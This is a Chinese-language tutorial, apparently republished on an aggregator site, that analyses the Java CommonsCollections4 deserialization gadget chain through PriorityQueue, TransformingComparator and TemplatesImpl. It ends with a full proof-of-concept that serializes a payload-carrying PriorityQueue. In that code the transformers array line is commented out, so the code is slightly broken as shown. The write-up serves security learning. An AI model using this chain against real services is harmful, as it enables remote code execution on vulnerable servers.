Java安全—CommonsCollections4

这篇具有很好参考价值的文章主要介绍了Java安全—CommonsCollections4。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

引子

CC4简单来说就是CC3前半部分和CC2后半部分拼接组成的,对于其利用的限制条件与CC2一致,一样需要在commons-collections-4.0版本使用,原因是TransformingComparator类在3.1-3.2.1版本中还没有实现Serializable接口,无法被反序列化。 接下来让我们仔细分析一下。

PriorityQueue

PriorityQueue是一个优先队列,作用是用来排序,重点在于每次排序都要触发传入的比较器comparator的compare()方法 在CC2中,此类用于调用PriorityQueue重写的readObject来作为触发入口

PriorityQueue中的readObject间接调用了compare() 而compare()最终调用了transform()

我们先看它的readobject()方法

private void readObject(java.io.ObjectInputStream s)throws java.io.IOException, ClassNotFoundException {// Read in size, and any hidden stuffs.defaultReadObject();// Read in (and discard) array lengths.readInt();queue = new Object[size];// Read in all elements.for (int i = 0; i < size; i++)queue[i] = s.readObject();// Elements are guaranteed to be in "proper order", but the// spec has never explained what that might be.heapify();
} 

重写了该方法并在最后调用了heapify()方法,我们跟进一下:

private void heapify() {for (int i = (size >>> 1) - 1; i >= 0; i--)siftDown(i, (E) queue[i]);
} 

这里的话需要长度等于2才能进入for循环,我们要怎样改变长度呢。

这里用到的是该类的add方法,将指定的元素插入此优先级队列。

heapify()调用了siftdown()方法,继续跟进:

private void siftDown(int k, E x) {if (comparator != null)siftDownUsingComparator(k, x);elsesiftDownComparable(k, x);
} 

可以看到判断条件

 if (comparator != null) 

调用了

siftDownUsingComparator(k, x); 

在siftDownUsingComparator()又调用了 comparator.compare()。

TransformingComparator

可以看到该类在CC3的版本中不能反序列化,在CC4的版本中便可以了。

TransformingComparator是一个修饰器,和CC1中的ChainedTransformer类似。

TransformingComparator里面存在compare方法,当我们调用时就会调用传入transformer对象的transform方法具体实现是this.transformer在传入ChainedTransformer后,会调用ChainedTransformer#transform反射链。

问题

1.就像刚才heapify里面所说的

private void heapify() {for (int i = (size >>> 1) - 1; i >= 0; i--)siftDown(i, (E) queue[i]);
} 

我们要进入循环要修改值,通过add方法。

priorityQueue.add(1);
priorityQueue.add(2); 

2.initialCapacity的值要大于1

3.comparator != null

4.通过反射来修改值防止在反序列化前调用,就如之前的链一样,我们到利用时再用反射修改参数。

类似这个样子:

Class c=transformingComparator.getClass();Field transformField=c.getDeclaredField("transformer");transformField.setAccessible(true);transformField.set(transformingComparator,chainedTransformer); 

我们先放置个反序列化前不会执行这条链的随便一个参数:

TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1)); 

POC

package ysoserial;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.convert.TransformWriteField;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.map.LazyMap;
import org.apache.xalan.xsltc.trax.TrAXFilter;
 
 
import javax.xml.crypto.dsig.Transform;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;
 
public class cc4 {
 public static void main(String[] args) throws Exception {TemplatesImpl templates=new TemplatesImpl();Class tc=templates.getClass();Field nameField=tc.getDeclaredField("_name");nameField.setAccessible(true);nameField.set(templates,"XINO");Field bytecodesField=tc.getDeclaredField("_bytecodes");bytecodesField.setAccessible(true);byte[] code = Files.readAllBytes(Paths.get("D://tmp/test.class"));byte[][] codes={code};bytecodesField.set(templates,codes);
 Field tfactoryField=tc.getDeclaredField("_tfactory");tfactoryField.setAccessible(true);tfactoryField.set(templates,new TransformerFactoryImpl());
 InstantiateTransformer instantiateTransformer=new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates});
 //Transformer[] transformers=new Transformer[]{new ConstantTransformer(TrAXFilter.class),instantiateTransformer};
 ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
 TransformingComparator transformingComparator=new TransformingComparator<>(new ConstantTransformer<>(1));
 PriorityQueue priorityQueue=new PriorityQueue<>(transformingComparator);priorityQueue.add(1);priorityQueue.add(2);
 Class c=transformingComparator.getClass();Field transformField=c.getDeclaredField("transformer");transformField.setAccessible(true);transformField.set(transformingComparator,chainedTransformer);
 
 
 serialize(priorityQueue);unserialize("ser.bin");
 }
 public static void serialize(Object obj) throws Exception{ObjectOutputStream oss=new ObjectOutputStream(new FileOutputStream("ser.bin"));oss.writeObject(obj);}
 public static void unserialize(Object obj) throws Exception{ObjectInputStream oss=new ObjectInputStream(new FileInputStream("ser.bin"));oss.readObject();}
 
} 

结语

这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。文章来源地址https://www.toymoban.com/news/detail-583084.html

到了这里,关于Java安全—CommonsCollections4的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Java安全——安全提供者

    安全提供者 在Java中,安全提供者(Security Provider)是一种实现了特定安全服务的软件模块。它提供了一系列的加密、解密、签名、验证和随机数生成等安全功能。安全提供者基础设施在Java中的作用是为开发人员提供一种扩展和替换标准安全功能的方式,以满足特定的安全需

    2024年02月12日
    浏览(41)
  • Java安全和防护:如何保护Java应用程序和用户数据的安全

      在当今数字化时代,Java已经成为主流的编程语言之一。无论是企业级应用程序还是个人项目,Java应用程序都承载着大量的敏感数据和业务逻辑。然而,随着网络攻击日益猖獗,保护Java应用程序和用户数据的安全变得尤为重要。本文将深入探讨Java应用程序安全的重要性,并

    2024年02月03日
    浏览(72)
  • java安全——Java 默认沙箱

    Java 默认沙箱 程序设计者或者管理员通过改变沙箱的参数从而完成权限的变动更新 Java默认沙箱的设计目的是为了保护系统和用户的安全。Java虚拟机提供了一种机制,让Java应用程序在一个受限的环境中运行,也就是“沙箱”。这个沙箱能够在应用程序中启用一些安全管理功能

    2024年02月13日
    浏览(38)
  • 【java】java接口安全之接口签名

            在实际实现中,发现body中参数可能包含数组,或者对象数组,此时按照以上需求也需要对每个key进行排序,否则会由于顺序原因造成前后端生成的签名不一致。         后续优化,将body转成流,再进行md5加密,生成签名。这样就避免了对body处理繁琐的加签操作。

    2024年02月15日
    浏览(37)
  • java安全(五)java反序列化

    给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 在调用RMI时,发现接收发送数据都是反序列化数据. 例如JSON和XML等语言,在网络上传递信息,都会用到一些格式化数据,大多数处理方法中,JSON和XML支持的数据类型就是基本数据类型,整型、浮点型、字符串、布尔等,如果

    2024年02月10日
    浏览(44)
  • java基础之线程安全问题以及线程安全集合类

    当多个线程同时访问同一个临界资源时,原子操作可能被破坏,会导致数据丢失, 就会触发线程安全问题 临界资源: 被多个线程同时访问的对象 原子操作: 线程访问临界资源的过程中不可更改和缺失的操作 互斥锁 每个对象都默认拥有互斥锁, 该锁默认不开启. 当开启互斥锁之后

    2024年01月18日
    浏览(60)
  • Java安全基础之Java Web核心技术

    目录 Java EE Java MVC Servlet JSP Filter JDBC RMI JNDI Java 平台有 3 个主要版本: Java SE(Java Platform Standard Edition,Java平台标准版) Java EE(Java Platform Enterprise Edition,Java 平台企业版) Java ME(Java Platform Micro Edition,Java 平台微型版) 其中 Java EE 是 Java 应用最广泛的版本。Java EE 也称为

    2024年04月22日
    浏览(35)
  • 【Java】Java中线程安全有哪些实现思路?

    在 Java 多线程编程中,线程安全是一个非常重要的概念。 线程安全通常指程序在多线程并发执行时,仍然能够保持正确的行为。 Java 提供了很多实现线程安全的方法,本文将介绍几种常见的实现思路。 synchronized 是 Java 中最基本的解决线程安全问题的方法,它可以确保

    2024年02月04日
    浏览(34)
  • Java多线程 - 线程安全和线程同步解决线程安全问题

    线程安全问题指的是: 多个线程同时操作同一个共享资源的时候可能会出现业务安全问题,称为线程安全问题。 举例: 取钱模型演示 需求:小明和小红是一对夫妻,他们有一个共同的账户,余额是10万元。 如果小明和小红同时来取钱,而且2人都要取钱10万元,可能出现什么问

    2023年04月15日
    浏览(41)
  • 41 JAVA安全-目录遍历访问控制XSS等安全问题

    Javaweb代码分析-目录遍历安全问题 代码解析及框架源码追踪: 第一关: Payload: …/x …/相当于跨越上级目录的符号,…/x可以更改默认上传文件的路径 通过命名文件的名字,在文件名命名加入路径符号,来实现将这个文件在上传路径上的更改 目录解析,如果对方设置了目录解

    2024年01月21日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包